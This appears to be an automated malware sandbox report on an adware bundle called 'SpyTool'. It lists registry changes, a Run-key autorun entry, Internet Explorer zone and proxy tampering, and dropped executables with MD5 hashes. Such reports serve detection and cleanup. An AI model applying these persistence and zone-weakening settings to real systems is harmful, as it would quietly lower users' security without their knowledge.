"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"InstallDate" = "20150902"

"QuietUninstallString" = "%Program Files%\gmsd_re_005010077\unins000.exe /SILENT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010077]
"PathInstall" = "%Program Files%\gmsd_re_005010077"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft]
"Tinstalls" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Tinstalls]
"20150902" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 81 4E 45 3B 6D 87 42 F1 0A 2B C4 B4 C0 20 1E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"InstallLocation" = "%Program Files%\gmsd_re_005010077\"

[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010077"

[HKCU\Software\TutoTag]
"OnceInstalled2" = "re"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010077" = "%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]

The process nsh2B.tmp:1860 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 35 44 33 39 E7 66 0C E0 EF 6D 9D DC 4F 79 5A"

The process encrypt.exe:560 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 62 74 2E BC FF 6A 13 BC 97 B8 E9 18 D4 DE 37"

The process encrypt.exe:1400 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 4F D0 9D 95 66 C8 8A 1F E1 52 3E 63 40 41 72"

The process encrypt.exe:424 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 63 8B 4C FD BE 73 59 B7 A0 59 4F 68 6F 1A FA"

The process encrypt.exe:460 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 78 DA EF 3C E8 3D 1D 2D 57 8F D8 10 40 1E 2B"

The process 3075.exe:976 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3496]
"setup.exe" = "Crossbrowse Installer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\CrossBrowser]
"Installation" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF AE A9 DA 6B 7E D1 A0 07 2F 04 95 E3 A2 3C 59"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallDate" = "20150821"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsiB.tmp:644 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 20 FC DA 89 B3 C3 43 CA BD 40 E4 7F F4 48 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsw7.tmp:1688 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 70 9A C4 05 C9 DE 19 B8 26 B4 4C EC 2D 3A 82"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-imi-tot-cpm-opw-crr"

The process nst36.tmp:2008 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "iml"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 CC 4A 42 1A E4 7D A7 E9 A0 46 54 82 6B 50 58"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsw22.tmp:272 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 25 BF 1E D5 C0 D1 94 47 1E 39 27 8B 0B DD D1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
f0196b97c3fba8a469b99d0919a3cf4cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe
d2a7b8934eb6ff84efc6479c91c8081bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3075.exe
de36bf8875ae7354dee15db775eb671dc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3496\setup.exe
2a5f246b97d00f77b78d15f72923839bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe
7b1977dca8506d7aa3b23732aeca6a26c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe
a3078153a7a53bfc0a7a0b8fd20d757ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\fsd34.exe
f9a709bbecced10d4a84f93c75604e04c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa19.tmp
5264f7d6d89d1dc04955cfb391798446c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\GetVersion.dll
b140459077c7c39be4bef249c2f84535c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\Math.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\System.dll
7579ade7ae1747a31960a228ce02e666c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\UserInfo.dll
5afd4a9b7e69e7c6e312b2ce4040394ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\blowfish.dll
94ba775c8a1f4d6c9bb1966eddce22b5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\manlib.dll
fe3f848e2a306d586ab8f5433738d8dbc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\nsCBHTML5.dll
c10e04dd4ad4277d5adc951bb331c777c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\nsDialogs.dll
5f13dbc378792f23e598079fc1e4422bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\nsisunz.dll
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\registry.dll
febff2c363c7f7664687eefe8253087ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd40.tmp\serlib.dll
f02155fa3e59a8fc48a74a236b2bb42ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj3.tmp\inetc.dll
fce81f5d5e6baabe8eb9f87a1bb3599cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjE.tmp
8a77f074c6628b81f94e144784f32adbc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm25.tmp
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2A.tmp\Registry.dll
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq1D.tmp\Registry.dll
b6513a83d6cc58be61812cce8148c6f5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq3D.tmp
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr21.tmp\Registry.dll
f9a709bbecced10d4a84f93c75604e04c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe
e822fe92076c33fa1784749fa9328584c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\df4a6a3ed77e60d6758afca091ca0c1f[1].exe
5c9336efb1faf577655bcd88a444c26bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lHFcE[1].exe
8a77f074c6628b81f94e144784f32adbc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_CPUminer[1].exe
a3078153a7a53bfc0a7a0b8fd20d757ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\FinalInstaller_dotnet4[1].exe
d2a7b8934eb6ff84efc6479c91c8081bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].exe
0ccf900044e0e4edf36e89008e2c6aa7c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_362[1].exe
2a5f246b97d00f77b78d15f72923839bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe
6f61b80a1552c32073f082cc1798cd71c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\policyname[1].exe
95368f27adfcaa865195174d724e7a4ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe
ad3ce40da858a76f235974af46c18365c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe
b6513a83d6cc58be61812cce8148c6f5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VuuPC_VO2_8907[1].exe
051e3f4fd2fc016148ab1e9c53e286d1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe
de36bf8875ae7354dee15db775eb671dc:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe
de36bf8875ae7354dee15db775eb671dc:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe
00ccf557175b834662b75c2fe6d8c7fac:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\PepperFlash\pepflashplayer.dll
cc24001b457f3cfb86ab174d68ffe02bc:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome.dll
8c51d8ebd090ff4d510ca25d01f04196c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_child.dll
b799e609a738b42a993ec13fbaedff8ec:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_elf.dll
c81e0c917d5db4fecd2ec3c7e2712bbfc:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\d3dcompiler_46.dll
670da7998dfbf06dae646c8d8f6e06c4c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe
c032d88eb99f7562bb58e00f41b9d6a4c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\ffmpegsumo.dll
0e2e43dc527bb894b4eaa0723b7d8450c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libegl.dll
8ff5fccdae68c1f04e29211b8ab2413ac:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libexif.dll
d081a7e3dd9a488c32621440efefd8a2c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libglesv2.dll
015b0ed92a5cc7ef3f727eafa50f34c3c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\metro_driver.dll
